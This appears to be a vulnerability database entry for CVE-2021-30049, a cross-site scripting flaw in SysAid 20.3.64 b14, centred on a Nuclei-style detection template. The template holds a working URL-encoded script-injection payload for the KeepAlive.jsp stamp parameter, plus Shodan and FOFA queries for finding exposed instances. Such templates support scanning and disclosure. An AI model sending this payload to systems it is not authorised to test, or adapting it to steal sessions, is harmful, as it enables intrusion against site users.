CVE-2021-30049: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: SysAid Technologies | POC: 已公开

漏洞描述

SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.

PoC代码[已公开]

id: CVE-2021-30049

info:
  name: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of SysAid Technologies 20.3.64 b14 to mitigate the XSS vulnerability.
  reference:
    - https://eh337.net/2021/03/30/sysaid/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30049
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-30049
    cwe-id: CWE-79
    epss-score: 0.10567
    epss-percentile: 0.92988
    cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:1540720428
    fofa-query: icon_hash=1540720428
  tags: cve2021,cve,xss,sysaid

http:
  - method: GET
    path:
      - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402202c4a16e2cbe1c28fb5bdbb121ad88cf71e4cc7408f92e291ea8f88073c19ccc702203bf4ceae9aa361a416650a22d48101ef066328707521d5cbabd580a28b85ade1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐